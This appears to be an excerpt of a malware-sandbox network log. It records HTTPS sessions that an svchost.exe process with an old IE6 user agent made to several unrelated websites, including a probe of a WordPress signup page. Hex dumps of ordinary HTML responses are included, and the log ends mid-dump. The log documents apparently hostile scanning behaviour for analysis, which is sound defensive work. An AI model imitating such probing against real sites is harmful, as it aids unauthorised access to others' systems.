                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Location: https://hyab.com
                                                                                                                                                                                                                                                                          Cache-Control: max-age=600
                                                                                                                                                                                                                                                                          Expires: Wed, 05 Jul 2023 06:17:43 GMT
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FtemiiCC8rNA%2Fld8sqJxTaUs9Z1WEG3w20EIR7lTesvAxHxEmrYd9ziKioMAg10hrxGgA3frlxxoeioX%2F2SaFhlm%2BN9643Cg8JL2N1sIEE7t1ilrAg%2FZKC76"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6deb8bdb1d9a-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5881INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5881INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          45192.168.2.6199783.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5881OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: dataform.co.uk
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5884INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                          Keep-Alive: timeout=2, max=90
                                                                                                                                                                                                                                                                          Content-Length: 49051
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                          X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:44 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5884INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5888INData Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                                          Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).conc
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5896INData Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65
                                                                                                                                                                                                                                                                          Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5904INData Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61
                                                                                                                                                                                                                                                                          Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5912INData Raw: 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 20 74 79 70 65 3d 22 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: o.uk/wp-content/uploads/2023/01/DF-icon-logo.svg" type="" sizes="32x32"/><link rel="apple-touch-icon" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-cont
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5920INData Raw: 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 44 61 74 61 66 6f 72 6d 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74
                                                                                                                                                                                                                                                                          Data Ascii: em-text"><span class="menu-text">Dataform</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-t
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5928INData Raw: 0a 76 61 72 20 77 70 63 66 37 3d 7b 22 61 70 69 53 65 74 74 69 6e 67 73 22 3a 7b 22 72 6f 6f 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a
                                                                                                                                                                                                                                                                          Data Ascii: var wpcf7={"apiSettings":{"root":"https:\/\/dataform.co.uk\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.j


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          46192.168.2.6193894.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5882OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: www.diamir.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5882INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:44 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5882INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          47192.168.2.62193172.67.193.133443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5883OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: hyab.com
                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=c5021e3740c078040485bf529df4f43e
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5883INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:44 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dzdotBTdYJ4k9MKGCjwEUxhpsRh1z%2FSq6xTItZRPeIPLYrDTQ5jTWAiPuxWbf1UJ1SK1HnACjsbYDwExd9LFFxma308ZerXesjJAKRRrRFGs7y2rE5Ny5Sb4gg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 7e1d6ded5e652d04-FRA
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2023-07-05 06:07:44 UTC5884INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          48192.168.2.6330035.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC5932OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: flamingorecordings.com
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC5932INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:45 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 75193
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          ETag: "6459edff-125b9"
                                                                                                                                                                                                                                                                          Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                                          X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC5933INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC5948INData Raw: 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 35 39 2e 30 33 31 20 31 39 35 2e 32 36 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 36 33 2e 32 35 38 20 31 39 38 2e 39 34 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 34 37 2e 32 32 35 20 31 39 35 2e 32 36 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 35 31 2e 34 35 32 20 31 39 38 2e 39 34 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 33 35 2e 34 31 39 20 31 39 35 2e
                                                                                                                                                                                                                                                                          Data Ascii: fill="#fff"/><polygon points="197.11 59.031 195.268 61.144 197.11 63.258 198.948 61.144 197.11 59.031" fill="#fff"/><polygon points="197.11 47.225 195.268 49.338 197.11 51.452 198.948 49.338 197.11 47.225" fill="#fff"/><polygon points="197.11 35.419 195.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC5964INData Raw: 20 31 31 33 2e 31 35 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 36 33 2e 32 35 38 20 31 31 36 2e 38 33 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 20 31 31 33 2e 31 35 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 35 31 2e 34 35 32 20 31 31 36 2e 38 33 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 33 35 2e 34 31 39 20 31 31 33 2e 31 35 34 20 33 37 2e 35 33 32 20 31 31 34 2e 39 39 36 20 33 39 2e 36 34 36 20 31 31 36 2e 38 33 34 20 33 37 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: 113.154 61.144 114.996 63.258 116.834 61.144 114.996 59.031" fill="#fff"/><polygon points="114.996 47.225 113.154 49.338 114.996 51.452 116.834 49.338 114.996 47.225" fill="#fff"/><polygon points="114.996 35.419 113.154 37.532 114.996 39.646 116.834 37.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC5980INData Raw: 34 2e 39 32 31 20 32 34 30 2e 30 34 32 20 31 34 32 2e 38 30 38 20 32 33 38 2e 32 30 33 20 31 34 30 2e 36 39 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 37 2e 35 36 35 20 32 35 30 2e 33 31 36 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 33 2e 33 33 37 20 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 38 2e 34 37 38 20 32 31 35 2e 37 35 39 20 32 35 30 2e 33 31 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 31 2e 35 33 31 20 32 34 36 2e 36 33 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 35
                                                                                                                                                                                                                                                                          Data Ascii: 4.921 240.042 142.808 238.203 140.694" fill="#fff"/><polygon points="246.638 225.451 248.478 227.565 250.316 225.451 248.478 223.337 246.638 225.451" fill="#fff"/><polygon points="248.478 215.759 250.316 213.645 248.478 211.531 246.636 213.645 248.478 215
                                                                                                                                                                                                                                                                          2023-07-05 06:07:45 UTC5996INData Raw: 38 20 39 34 2e 34 34 38 20 32 30 33 2e 39 35 32 20 39 36 2e 32 38 36 20 32 30 31 2e 38 33 38 20 39 34 2e 34 34 38 20 31 39 39 2e 37 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 20 39 32 2e 36 31 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 39 32 2e 31 34 36 20 39 36 2e 32 38 36 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33 20 39 32 2e 36 31 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 38 30 2e 33 34 20 39 36 2e 32 38 36 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33
